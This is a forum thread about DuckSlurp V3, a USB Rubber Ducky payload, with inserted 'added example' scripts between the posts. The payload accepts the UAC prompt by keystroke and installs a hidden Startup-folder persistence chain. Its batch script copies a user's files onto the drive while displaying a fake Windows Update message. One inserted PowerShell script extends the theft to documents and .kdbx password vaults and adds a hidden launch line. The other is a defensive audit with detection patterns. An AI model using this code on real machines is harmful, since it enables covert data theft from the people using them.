
DuckSlurp V2.1?



I just had an idea that came from one of the Hak5 episodes about the Ducky. Darren mentioned something about having the DuckyWait.bat always running so you could just come by and plug in the DUCKY USB (not the actual Ducky) and it would copy all of the files you told it to without running the Ducky every time. From what I can see it would only take one change in the coding of DuckSlurp V2.

REM *** Change directories because System32 appears to be protected. ***
STRING CD %TEMP%
ENTER

Just change "%TEMP%" to "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" and it will create the DuckyWait.bat in the startup folder, so every time the computer is restarted, so is the DuckyWait.bat. What do you guys think?



I suppose you could use the firmware which only runs when you tap the button, thereby only running the payload when you actually need to. You could also put an if statement in DuckSlurp which prevents overwriting the DuckSlurp payload if it already exists (I would kill for a Ducky case which has a button on it so I didn't have to take it out of the case every time I wanted to tap the button). The if statement wouldn't be surreptitious, though, if you wanted to plug in the Duck while the user was looking.

Now, the problem with moving a batch file to the start-up folder is that you cannot tell the batch file to run invisibly; Windows automatically runs everything in the start-up folder. What is needed is some indirection whereby DuckSlurp is somewhere else, and only a small start-up command is present in the start-up folder. The "invis.vbs" call and "wscript.exe" need to be included in whatever batch file is resident there. If there was only one batch file in the start-up folder then you would essentially have a black box (DOS box) appear at start-up, then exit itself or something. I would have to do some tinkering to see if this would work. The problem is you have to be very specific in order to make batch files run silently on Windows Vista/7.

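The indirection discussed in the post above (a tiny stub in a Startup folder that hands the real script to wscript.exe so no console stays visible) is also exactly what a defender would look for on a host. The following audit script is an added example, not code from the thread: it lists the current-user and all-users Startup folders and flags scripts or shortcuts that invoke a script host, ask for a hidden window, or reference a user-writable location such as %TEMP%. The pattern list is an assumption and can be extended; it needs PowerShell 3 or later.

```powershell
# Added example (not from the thread): audit both Startup folders for launcher
# stubs of the kind described above. Runs as an unprivileged user; the all-users
# folder (C:\ProgramData\...\Startup) is readable without elevation.
$startupDirs = @(
    [Environment]::GetFolderPath('Startup')        # per-user Startup folder
    [Environment]::GetFolderPath('CommonStartup')  # all-users Startup folder
)

# Assumed pattern list (regex, case-insensitive); extend to taste.
$suspicious = @(
    'wscript\.exe', 'cscript\.exe', 'mshta\.exe',
    'powershell.*-w(indowstyle)?\s+hidden',
    '%TEMP%', '%APPDATA%', '%LOCALAPPDATA%', '\.vbs\b'
)

$findings = foreach ($dir in $startupDirs) {
    if (-not (Test-Path -LiteralPath $dir)) { continue }
    Get-ChildItem -LiteralPath $dir -File -Force |
        Where-Object { $_.Extension -in '.bat', '.cmd', '.vbs', '.js', '.ps1', '.lnk' } |
        ForEach-Object {
            $file = $_
            if ($file.Extension -eq '.lnk') {
                # Shortcuts: inspect target and arguments rather than file bytes.
                $sh      = New-Object -ComObject WScript.Shell
                $lnk     = $sh.CreateShortcut($file.FullName)
                $content = "$($lnk.TargetPath) $($lnk.Arguments)"
            } else {
                $content = Get-Content -LiteralPath $file.FullName -Raw -ErrorAction SilentlyContinue
            }
            $hits = $suspicious | Where-Object { $content -match $_ }
            if ($hits) {
                [pscustomobject]@{
                    Path     = $file.FullName
                    Modified = $file.LastWriteTime
                    Owner    = (Get-Acl -LiteralPath $file.FullName).Owner
                    Matches  = ($hits -join ', ')
                    # First line that triggered a match, for quick triage.
                    Snippet  = ($content -split "`r?`n" |
                                Where-Object { $_ -match ($hits -join '|') } |
                                Select-Object -First 1)
                }
            }
        }
}

if ($findings) { $findings | Format-List } else { 'No launcher stubs found in Startup folders.' }

# Complementary live check: a resident waiter launched this way shows up as
# wscript.exe/cscript.exe hosting a .vbs with a .bat argument, with cmd.exe as its child.
Get-CimInstance Win32_Process -Filter "Name = 'wscript.exe' OR Name = 'cscript.exe'" |
    Select-Object ProcessId, ParentProcessId, CommandLine
```

A stub of the shape "start wscript.exe %TEMP%\invis.vbs %TEMP%\DuckyWait.bat" trips three of the patterns at once (wscript.exe, %TEMP%, .vbs), and the Owner and Modified columns show who dropped it and when.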

Better make it V3. The following should work. A cmd window will pop up on reboot, but it exits almost instantly, kicking off the batch process. You could do the same thing with registry keys, and one less file, but I think this way there are fewer assumptions about having admin access.

REM Author: overwraith modified by dkitchen
REM Name: DuckSlurp_V3.txt
REM Purpose: Duck Slurp payload, copy files off of the host computer. 
REM Encoder V2.4+
REM Using the run command for a broader OS base. 

REM *** Initial Delay *** 
DELAY 2000

REM *** Elevate: open cmd through the UAC prompt and accept it (ALT y) ***
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500


REM *** Change directories because System32 appears to be protected. ***
STRING CD %TEMP%
ENTER

REM *** Delete wait batch file if already exists ***
STRING erase /Q DuckyWait.bat
ENTER

REM *** Make batch file that waits for the DUCKY volume to mount. ***
STRING copy con DuckyWait.bat
ENTER
STRING @echo off
ENTER
STRING :while1
ENTER
REM *** Find the DUCKY drive: the label is token 6 of "Volume in drive X is LABEL" ***
REM *** (2^>nul hides the error vol prints for letters that have no drive) ***
STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do (
ENTER
STRING for /f "tokens=6 delims= " %%i in ('Vol %%d: 2^>nul') do (
ENTER
STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
ENTER
STRING )
ENTER
STRING )
ENTER
REM *** Nothing found yet: sleep and poll again ***
STRING if [%DuckyDrive%] EQU [] (
ENTER
STRING timeout /t 3 >nul
ENTER
STRING goto :while1
ENTER
STRING )
ENTER
REM *** Found it: run DuckSlurp.bat from the DuckSlurp folder on that drive ***
STRING set DuckyDrive=%DuckyDrive%\DuckSlurp
ENTER
STRING Start %DuckyDrive%\DuckSlurp.bat
ENTER
CONTROL z
ENTER

REM *** Delete Invisible vbs file if already exists ***
STRING erase /Q invis.vbs
ENTER

REM *** Make VBS file to run invisibly ***
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL z
ENTER

REM *** Change directories to startup folder ***
STRING cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
ENTER

REM *** Delete program start if already exists ***
STRING erase /Q SlurpStart.bat
ENTER

REM *** Make batch file that starts from the startup folder ***
STRING copy con SlurpStart.bat
ENTER
REM *** Hand DuckyWait.bat to invis.vbs so it runs with no visible window. ***
REM *** %TEMP% here is the logged-on user's temp, where the files above were written. ***
STRING @start wscript.exe %TEMP%\invis.vbs %TEMP%\DuckyWait.bat >nul
ENTER
STRING exit
ENTER
CONTROL z
ENTER

REM *** Start the slurp program ***
STRING SlurpStart.bat
ENTER


REM *** Exit ***
STRING EXIT
ENTER

Here is the DuckSlurp.bat file which should reside on your exfil drive.

@echo off
echo Installing Windows Update
set "source=%USERPROFILE%\Desktop\EvilPlans"
rem %~d0 is the drive this batch file lives on, i.e. the DUCKY volume
set "destination=%~d0\DuckSlurp\%COMPUTERNAME%"
mkdir "%destination%" 2>nul

rem Test the folder actually being copied, then copy it with subfolders (/E),
rem treating the target as a directory (/I) and never prompting (/Y)
if exist "%source%" (
    xcopy "%source%" "%destination%\EvilPlans\" /E /I /Y >nul
)

cls
exit

Of course you would substitute the directory path with the files you would like to copy off the computer, perhaps with a loop which goes through the directories, copying certain extensions, etc.

PS. This version runs the DuckSlurp.bat file where it can be seen, so that you know when all the files are done copying; replace this line " STRING Start %DuckyDrive%\DuckSlurp.bat " with this one " STRING wscript.exe %TEMP%\invis.vbs %DUCKYdrive%\DuckSlurp.bat " to make it silent again (remove outer quotes).

Edited by overwraith
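The post above suggests replacing the fixed Desktop\EvilPlans copy with a loop over directories and extensions, and its DuckyWait.bat finds the drive by picking token 6 out of the text that vol prints, which breaks as soon as a label contains a space. The script below is an added example, not the thread's code: a PowerShell equivalent of DuckyWait.bat plus DuckSlurp.bat that resolves the drive by volume label through WMI and copies files by extension list into <drive>:\DuckSlurp\<COMPUTERNAME>, preserving relative paths. The label, extension list, source roots and poll interval are assumptions exposed as parameters; it needs PowerShell 3 or later.

```powershell
# Added example (not from the thread): wait for a removable volume with the
# given label, then copy files by extension from the chosen roots onto it.
param(
    [string]   $Label       = 'DUCKY',                                   # assumed volume label
    [string[]] $Extensions  = @('.docx', '.xlsx', '.pdf', '.kdbx'),        # assumed extension list
    [string[]] $SourceRoots = @("$env:USERPROFILE\Documents", "$env:USERPROFILE\Desktop"),
    [int]      $PollSeconds = 3
)

function Find-DriveByLabel([string]$VolumeLabel) {
    # Win32_Volume exposes Label as a property, so labels with spaces work and
    # no token counting on vol's output is needed. DriveType 2 = removable.
    Get-CimInstance Win32_Volume -Filter "DriveType = 2" |
        Where-Object { $_.Label -eq $VolumeLabel -and $_.DriveLetter } |
        Select-Object -First 1 -ExpandProperty DriveLetter            # e.g. "E:"
}

function Copy-ByExtension([string[]]$Roots, [string[]]$Exts, [string]$Destination) {
    $copied = 0
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        Get-ChildItem -LiteralPath $root -Recurse -File -ErrorAction SilentlyContinue |
            Where-Object { $_.Extension -in $Exts } |
            ForEach-Object {
                # Keep the path relative to the root so same-named files in
                # different folders do not overwrite each other on the drive.
                $rel  = $_.FullName.Substring($root.Length).TrimStart('\')
                $dest = Join-Path $Destination (Join-Path (Split-Path $root -Leaf) $rel)
                New-Item -ItemType Directory -Path (Split-Path $dest -Parent) -Force | Out-Null
                Copy-Item -LiteralPath $_.FullName -Destination $dest -Force
                $copied++
            }
    }
    return $copied
}

# Poll until the labelled drive appears, then copy once and exit. The Startup
# stub starts the script again at the next logon, like DuckyWait.bat.
while (-not ($drive = Find-DriveByLabel $Label)) { Start-Sleep -Seconds $PollSeconds }

$destination = Join-Path "$drive\DuckSlurp" $env:COMPUTERNAME
New-Item -ItemType Directory -Path $destination -Force | Out-Null
$n = Copy-ByExtension -Roots $SourceRoots -Exts $Extensions -Destination $destination
"Copied $n file(s) to $destination"
```

To run it from a Startup stub without a lingering window, the stub line would be `start "" powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "%TEMP%\DuckyWait.ps1"` (a console still flashes briefly, as with the batch version). The invis.vbs from the post wraps its single argument in quotes, so it cannot be used as-is for a command with arguments; it only suits a bare script path.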
